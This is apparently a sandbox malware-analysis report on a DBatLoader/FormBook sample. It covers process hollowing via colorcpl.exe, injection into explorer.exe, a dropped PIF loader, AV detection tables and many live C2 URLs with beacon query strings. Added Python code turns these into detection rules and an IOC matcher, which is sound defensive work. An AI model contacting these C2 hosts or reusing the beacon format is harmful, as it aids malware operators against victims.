              Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 11 Masquerading | LSA Secrets | 331 Security Software Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | - | - | Data Encrypted for Impact | Server | Gather Victim Network Information
              Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | - | - | Service Stop | Botnet | Domain Properties
              External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | - | - | Inhibit System Recovery | Web Services | DNS
              Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | - | - | Defacement | Serverless | Network Trust Dependencies
              Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 812 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols | - | - | Internal Defacement | Malvertising | Network Topology
              Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | File Transfer Protocols | - | - | External Defacement | Compromise Infrastructure | IP Addresses

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
Behavior Graph
ID: 1350545 | Sample: Fpopgapwdcgvxn.exe | Startdate: 30/11/2023 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.thnkotb.com; www.stellarskyline.com; 17 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 8 other signatures
  +-- Fpopgapwdcgvxn.exe (started)
      Dropped: C:\Users\Public\Libraries\Telragab.PIF (PE32)
      Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
      +-- colorcpl.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
          +-- explorer.exe (injected)
              DNS/IP: kermisbedrijfkramer.online 37.97.254.27 (49752 -> 80, TRANSIP-AS, Amsterdam, the Netherlands, NL); www.harmonicod.com 104.247.81.50 (49751 -> 80, TEAMINTERNET-CA-AS, CA, Canada); 5 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit)
              +-- Telragab.PIF (started)
                  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures
                  +-- colorcpl.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
              +-- rundll32.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  +-- cmd.exe (started)
                      +-- conhost.exe (started)
              +-- Telragab.PIF (started)
                  Signatures: Allocates many large memory junks
                  +-- SndVol.exe (started)
                  +-- WerFault.exe (started)
              +-- chkdsk.exe (started)
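The behavior graph above is the detection surface a hunter cares about: a PE dropped with a .PIF extension under C:\Users\Public\Libraries, a signed utility (colorcpl.exe) started by a user-land parent and then used as a hollowing host, explorer.exe talking to non-Microsoft hosts after being injected, and the injected rundll32.exe spawning cmd.exe. The Python below is an added example, not part of the Joe Sandbox report: it encodes those four observations as hunt rules and runs them over a constructed, Sysmon-style reconstruction of the graph. The event field names, the System32 paths for the signed utilities, the sample's own path and the list of "benign" explorer.exe endpoints are assumptions made for this example.

```python
"""Hunt rules for the DBatLoader -> FormBook process chain in the report.

Added example; it is not part of the Joe Sandbox report. EVENTS is a
constructed, Sysmon-style reconstruction of the behavior graph. Field names,
the System32 paths, the sample's path and the benign-endpoint list are
assumptions made for this example.
"""
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# Parents that may legitimately start signed utilities such as colorcpl.exe.
SYSTEM_PARENT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_PARENTS = ("c:\\windows\\explorer.exe",)
# explorer.exe normally talks to Microsoft endpoints (the report rates msn.com,
# windows.com, live.com and 1drv.com as high reputation); anything else
# initiated by explorer.exe is treated as post-injection traffic. Assumption.
BENIGN_SUFFIXES = (".msn.com", ".windows.com", ".live.com", ".1drv.com")
# Signed utility this sample used as a hollowing host; extend as needed.
HOLLOW_HOSTS = {"colorcpl.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass
class Event:
    kind: str                      # "process" | "file" | "network"
    image: str                     # image path of the acting/new process
    parent: Optional[str] = None   # parent image for process events
    target: Optional[str] = None   # file written, or host contacted


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_system_parent(path: str) -> bool:
    p = path.lower()
    return p.startswith(SYSTEM_PARENT_DIRS) or p in SYSTEM_PARENTS


def rule_pif_under_public(ev: Event) -> Optional[str]:
    """PE written to or run from C:\\Users\\Public with a .PIF extension."""
    if ev.kind not in ("file", "process"):
        return None
    path = ev.target if ev.kind == "file" else ev.image
    if path and path.lower().startswith("c:\\users\\public\\") and path.lower().endswith(".pif"):
        return f"PIF under Users\\Public: {path}"
    return None


def rule_hollow_host_user_parent(ev: Event) -> Optional[str]:
    """Signed utility started by a parent that is not itself a system binary."""
    if (ev.kind == "process" and basename(ev.image) in HOLLOW_HOSTS
            and ev.parent and not is_system_parent(ev.parent)):
        return f"{basename(ev.image)} spawned by {ev.parent}"
    return None


def rule_explorer_outbound(ev: Event) -> Optional[str]:
    """explorer.exe connecting to a host outside the known Microsoft endpoints."""
    if ev.kind == "network" and basename(ev.image) == "explorer.exe" and ev.target:
        if not ev.target.lower().endswith(BENIGN_SUFFIXES):
            return f"explorer.exe -> {ev.target}"
    return None


def rule_rundll32_spawns_shell(ev: Event) -> Optional[str]:
    """rundll32.exe (an injection target in this chain) launching a shell."""
    if (ev.kind == "process" and ev.parent and basename(ev.parent) == "rundll32.exe"
            and basename(ev.image) in SHELLS):
        return f"rundll32.exe -> {basename(ev.image)}"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    rule_pif_under_public, rule_hollow_host_user_parent,
    rule_explorer_outbound, rule_rundll32_spawns_shell,
]


def run_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, detail) for every rule that fires on an event."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append((rule.__name__, detail))
    return hits


SAMPLE = "C:\\Users\\user\\Desktop\\Fpopgapwdcgvxn.exe"   # assumed location
PIF = "C:\\Users\\Public\\Libraries\\Telragab.PIF"           # path from the report
SYS32 = "C:\\Windows\\System32\\"
EXPLORER = "C:\\Windows\\explorer.exe"

# Constructed events mirroring the behavior graph (not sandbox output).
EVENTS = [
    Event("file", SAMPLE, target=PIF),
    Event("process", SYS32 + "colorcpl.exe", parent=SAMPLE),
    Event("network", EXPLORER, target="kermisbedrijfkramer.online"),
    Event("network", EXPLORER, target="www.harmonicod.com"),
    Event("network", EXPLORER, target="api.msn.com"),          # normal traffic
    Event("process", PIF, parent=EXPLORER),
    Event("process", SYS32 + "rundll32.exe", parent=EXPLORER),
    Event("process", SYS32 + "chkdsk.exe", parent=EXPLORER),
    Event("process", SYS32 + "colorcpl.exe", parent=PIF),
    Event("process", SYS32 + "cmd.exe", parent=SYS32 + "rundll32.exe"),
    Event("process", SYS32 + "conhost.exe", parent=SYS32 + "cmd.exe"),
]

if __name__ == "__main__":
    for name, detail in run_rules(EVENTS):
        print(f"{name}: {detail}")
```

Two of the four rules are deliberately narrow. explorer.exe spawning rundll32.exe or chkdsk.exe is not flagged on its own, because explorer.exe launches both legitimately and the report shows no command lines to discriminate on; the shell-from-rundll32 rule and the explorer.exe egress rule carry that part of the chain instead. The hollowing-host rule keys on the parent, not on colorcpl.exe itself, which is a signed Windows binary in its normal location in every process event above.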

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
Fpopgapwdcgvxn.exe | 70% | ReversingLabs | Win32.Trojan.ModiLoader
Fpopgapwdcgvxn.exe | 69% | Virustotal |
Fpopgapwdcgvxn.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Telragab.PIF | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Telragab.PIF | 70% | ReversingLabs | Win32.Trojan.ModiLoader

Unpacked PE Files
No Antivirus matches

Domains
Source | Detection | Scanner | Label
leathfortexas.com | 10% | Virustotal |
thnkotb.com | 4% | Virustotal |
www.hivaom.top | 0% | Virustotal |
www.maltsky.net | 7% | Virustotal |
kermisbedrijfkramer.online | 9% | Virustotal |
stellarskyline.com | 6% | Virustotal |
www.harmonicod.com | 1% | Virustotal |
www.thnkotb.com | 0% | Virustotal |
www.stellarskyline.com | 0% | Virustotal |
www.leathfortexas.com | 3% | Virustotal |
www.sprockettrucking.com | 1% | Virustotal |
www.kermisbedrijfkramer.online | 1% | Virustotal |
www.ouxodb001.cfd | 1% | Virustotal |
www.optimusvisionlb.com | 0% | Virustotal |

URLs
Source | Detection | Scanner | Label
https://word.office.comM | 0% | URL Reputation | safe
https://outlook.come | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
http://www.hivaom.topReferer: | 0% | Avira URL Cloud | safe
http://www.thnkotb.com | 0% | Avira URL Cloud | safe
http://www.canwealljustagree.comReferer: | 0% | Avira URL Cloud | safe
http://www.harmonicod.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.oaistetic.comReferer: | 0% | Avira URL Cloud | safe
http://www.canwealljustagree.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.ecofare.xyz/ao65/ | 100% | Avira URL Cloud | phishing
http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com | 100% | Avira URL Cloud | malware
http://www.optimusvisionlb.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.kermisbedrijfkramer.online | 100% | Avira URL Cloud | phishing
http://www.stellarskyline.com | 0% | Avira URL Cloud | safe
http://www.harmonicod.com/ao65/ | 4% | Virustotal |
http://www.ecofare.xyz/ao65/ | 2% | Virustotal |
http://www.optimusvisionlb.com/ao65/ | 2% | Virustotal |
http://www.canwealljustagree.com/ao65/ | 10% | Virustotal |
http://www.sprockettrucking.com/ao65/www.leathfortexas.com | 100% | Avira URL Cloud | malware
http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.thnkotb.comReferer: | 0% | Avira URL Cloud | safe
http://www.stellarskyline.com | 0% | Virustotal |
http://www.ouxodb001.cfdReferer: | 0% | Avira URL Cloud | safe
http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website | 100% | Avira URL Cloud | malware
http://www.thnkotb.com | 0% | Virustotal |
http://www.hivaom.top/ao65/www.canwealljustagree.com | 100% | Avira URL Cloud | phishing
http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com | 100% | Avira URL Cloud | malware
http://www.maltsky.netReferer: | 0% | Avira URL Cloud | safe
http://www.kermisbedrijfkramer.online | 1% | Virustotal |
http://www.1techtrendzstore.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.optimusvisionlb.com/ao65/www.maltsky.net | 100% | Avira URL Cloud | malware
http://www.1techtrendzstore.com/ao65/ | 2% | Virustotal |
www.hivaom.top/ao65/ | 100% | Avira URL Cloud | phishing
http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.leathfortexas.com | 0% | Avira URL Cloud | safe
http://www.stellarskyline.com/ao65/www.hivaom.top | 100% | Avira URL Cloud | malware
http://www.oaistetic.com | 0% | Avira URL Cloud | safe
http://www.leathfortexas.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.sprockettrucking.com | 0% | Avira URL Cloud | safe
http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | phishing
www.hivaom.top/ao65/ | 2% | Virustotal |
http://www.kermisbedrijfkramer.online/ao65/ | 100% | Avira URL Cloud | malware
http://www.leathfortexas.com/ao65/ | 6% | Virustotal |
http://www.kuis-raja-borong.website/ao65/ | 100% | Avira URL Cloud | malware
http://www.hivaom.top/ao65/ | 100% | Avira URL Cloud | phishing
http://www.sprockettrucking.com | 1% | Virustotal |
http://www.ecofare.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.sprockettrucking.comReferer: | 0% | Avira URL Cloud | safe
http://www.kuis-raja-borong.website/ao65/www.oaistetic.com | 100% | Avira URL Cloud | malware
http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.ouxodb001.cfd | 0% | Avira URL Cloud | safe
http://www.leathfortexas.com | 3% | Virustotal |
http://www.sprockettrucking.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.hivaom.top/ao65/ | 2% | Virustotal |
http://www.kuis-raja-borong.websiteReferer: | 0% | Avira URL Cloud | safe
http://www.canwealljustagree.com | 100% | Avira URL Cloud | malware
http://www.maltsky.net/ao65/www.thnkotb.com | 100% | Avira URL Cloud | malware
http://www.kermisbedrijfkramer.online/ao65/ | 4% | Virustotal |
http://www.harmonicod.comReferer: | 0% | Avira URL Cloud | safe
http://www.ecofare.xyz | 0% | Avira URL Cloud | safe
http://www.optimusvisionlb.comReferer: | 0% | Avira URL Cloud | safe
http://www.ouxodb001.cfd | 1% | Virustotal |
http://www.ecofare.xyz/ao65/www.iokgw1.top | 100% | Avira URL Cloud | phishing
http://www.kuis-raja-borong.website | 0% | Avira URL Cloud | safe
http://www.oaistetic.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.optimusvisionlb.com | 0% | Avira URL Cloud | safe
http://www.leathfortexas.comReferer: | 0% | Avira URL Cloud | safe
http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP | 100% | Avira URL Cloud | malware
http://www.stellarskyline.com/ao65/ | 100% | Avira URL Cloud | malware
http://www.stellarskyline.comReferer: | 0% | Avira URL Cloud | safe
http://www.canwealljustagree.com/ao65/www.ecofare.xyz | 100% | Avira URL Cloud | malware
http://www.leathfortexas.com/ao65/www.ouxodb001.cfd | 100% | Avira URL Cloud | malware
http://www.maltsky.net/ao65/ | 100% | Avira URL Cloud | malware
http://www.thnkotb.com/ao65/www.harmonicod.com | 100% | Avira URL Cloud | malware
Contacted Domains
Name | IP | Active | Malicious | Reputation
leathfortexas.com | 3.33.130.190 | true | true | unknown
thnkotb.com | 3.33.130.190 | true | true | unknown
www.hivaom.top | 156.237.159.158 | true | true | unknown
optimus-vision.odoo.com | 34.93.103.39 | true | false | high
www.maltsky.net | 104.140.89.24 | true | true | unknown
kermisbedrijfkramer.online | 37.97.254.27 | true | true | unknown
stellarskyline.com | 62.72.50.88 | true | true | unknown
www.harmonicod.com | 104.247.81.50 | true | true | unknown
www.thnkotb.com | unknown | unknown | true | unknown
www.stellarskyline.com | unknown | unknown | true | unknown
naopta.bn.files.1drv.com | unknown | unknown | false | high
onedrive.live.com | unknown | unknown | false | high
www.leathfortexas.com | unknown | unknown | true | unknown
www.sprockettrucking.com | unknown | unknown | true | unknown
www.ouxodb001.cfd | unknown | unknown | true | unknown
www.kermisbedrijfkramer.online | unknown | unknown | true | unknown
www.optimusvisionlb.com | unknown | unknown | true | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: malware | unknown
http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: malware | unknown
http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: malware | unknown
www.hivaom.top/ao65/ | true | Virustotal: 2%; Avira URL Cloud: phishing | low
http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP | false | Avira URL Cloud: malware | unknown
http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: phishing | unknown
http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: malware | unknown
http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP | true | Avira URL Cloud: malware | unknown
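Every contacted URL above shares one shape: a host from the report's domain list, the path /ao65/, and the same two query keys (3f94p and ojq4i) carrying opaque base64-looking values. That path plus query-key pair is the per-campaign fingerprint worth matching on, while the host list is only partly useful on its own, because FormBook configurations mix live C2 domains with decoys. The Python below is an added example, not part of the Joe Sandbox report: it parses the flattened URL rows exactly as they appear in the tables above, derives the campaign path, query keys and domain set from them, and then matches candidate URLs against that fingerprint. Two parsing choices are this example's own assumptions rather than anything the report states: a trailing "Referer:" is treated as an adjacent HTTP-header string rather than part of the URL, and a row of the form http://A/ao65/www.B is treated as two adjacent strings (A's C2 path followed by the next domain B in the configuration list).

```python
"""Pull FormBook-style C2 indicators out of the report's flattened URL rows.

Added example, not part of the Joe Sandbox report. REPORT_ROWS is a
constructed subset of rows copied from the report's URL tables, where
extraction ran URL, detection percentage, scanner and label together.
Assumptions: a trailing "Referer:" is an adjacent header string, and
"http://A/ao65/www.B" is A's C2 path followed by the next list domain B.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qsl

# Constructed input: rows as they appear in the report (subset).
REPORT_ROWS = [
    "http://www.harmonicod.com/ao65/100%Avira URL Cloudmalware",
    "http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com100%Avira URL Cloudmalware",
    "http://www.hivaom.topReferer:0%Avira URL Cloudsafe",
    "http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware",
    "http://www.stellarskyline.com0%Avira URL Cloudsafe",
    "www.hivaom.top/ao65/100%Avira URL Cloudphishing",
    "http://www.thnkotb.com/ao65/www.harmonicod.com100%Avira URL Cloudmalware",
    "http://www.leathfortexas.com/ao65/6%VirustotalBrowse",
    "http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware",
]

# URL, then "<n>%", then the scanner name, then an optional label/link text.
ROW_RE = re.compile(r"^(?P<url>.*?)(?P<pct>\d{1,3})%"
                    r"(?P<scanner>Avira URL Cloud|Virustotal|URL Reputation)(?P<label>.*)$")
URL_RE = re.compile(r"^(?:https?://)?(?P<host>[^/?]+)(?P<path>/[^?]*)?(?:\?(?P<query>.*))?$")
# "/ao65/www.next-domain" = C2 path immediately followed by the next list entry.
ADJACENT_RE = re.compile(r"^(?P<path>/[^/]+/)(?P<next_host>www\.[^/]+)$")


def parse_url(url: str) -> Optional[dict]:
    """Split a (possibly scheme-less) URL into host, path, query keys, next_host."""
    if url.endswith("Referer:"):               # adjacent header string (assumption)
        url = url[: -len("Referer:")]
    u = URL_RE.match(url)
    if not u:
        return None
    path = u.group("path") or "/"
    next_host = None
    adj = ADJACENT_RE.match(path)
    if adj:                                    # two adjacent strings (assumption)
        path, next_host = adj.group("path"), adj.group("next_host")
    keys = [k for k, _ in parse_qsl(u.group("query") or "", keep_blank_values=True)]
    return {"host": u.group("host").lower(), "path": path,
            "query_keys": keys, "next_host": next_host}


def parse_row(row: str) -> Optional[dict]:
    """Parse one flattened table row: URL fields plus scanner, detection, label."""
    m = ROW_RE.match(row)
    if not m:
        return None
    parsed = parse_url(m.group("url"))
    if parsed:
        parsed.update(scanner=m.group("scanner"), detection=int(m.group("pct")),
                      label=m.group("label"))
    return parsed


def extract_iocs(rows: List[str]) -> Dict[str, object]:
    """Derive campaign path, query keys and domain set from the report rows."""
    parsed = [p for p in (parse_row(r) for r in rows) if p]
    # Rows carrying a query string are the observed beacons; their common
    # path names the campaign.
    beacons = [p for p in parsed if p["query_keys"]]
    c2_path = Counter(p["path"] for p in beacons).most_common(1)[0][0]
    query_keys: Set[str] = set()
    for p in beacons:
        query_keys.update(p["query_keys"])
    hosts: Set[str] = set()
    for p in parsed:
        if p["path"] == c2_path:
            hosts.add(p["host"])
            if p["next_host"]:
                hosts.add(p["next_host"])
    return {"c2_path": c2_path, "query_keys": query_keys, "hosts": hosts}


def is_c2_beacon(url: str, iocs: Dict[str, object]) -> bool:
    """True when host, path and query-key set all match the extracted fingerprint."""
    p = parse_url(url)
    return bool(p) and p["host"] in iocs["hosts"] and p["path"] == iocs["c2_path"] \
        and set(p["query_keys"]) == iocs["query_keys"]


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_ROWS)
    print("path:", iocs["c2_path"], "keys:", sorted(iocs["query_keys"]))
    print("hosts:", sorted(iocs["hosts"]))
```

The matcher requires all three parts (host, path, exact query-key set) so that a lone hit on a domain that is merely a decoy does not fire; conversely, a proxy log entry that has the path and both keys but a host not yet on the list is the case to investigate by hand, since that is what a newly rotated C2 domain in the same campaign looks like. FormBook rotates both the path and the key names between campaigns, so the fingerprint extracted here is specific to the sample in this report.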
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.canwealljustagree.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.harmonicod.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.canwealljustagree.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.thnkotb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.hivaom.topReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://www.oaistetic.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ecofare.xyz/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://www.optimusvisionlb.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          https://naopta.bn.files.1drv.com/y4m4gdZgN9vpD5zAE34F6nOBodS76VsiZvQO69itA_Kz97aCmsmB5p4T1sYe5ZzwMe6Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://naopta.bn.files.1drv.com/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD9ztdTelragab.PIF, 00000009.00000002.2579759920.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.kermisbedrijfkramer.onlineexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: phishing
                              unknown
                              https://onedrive.live.com/download?rFpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://word.office.comMexplorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.stellarskyline.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
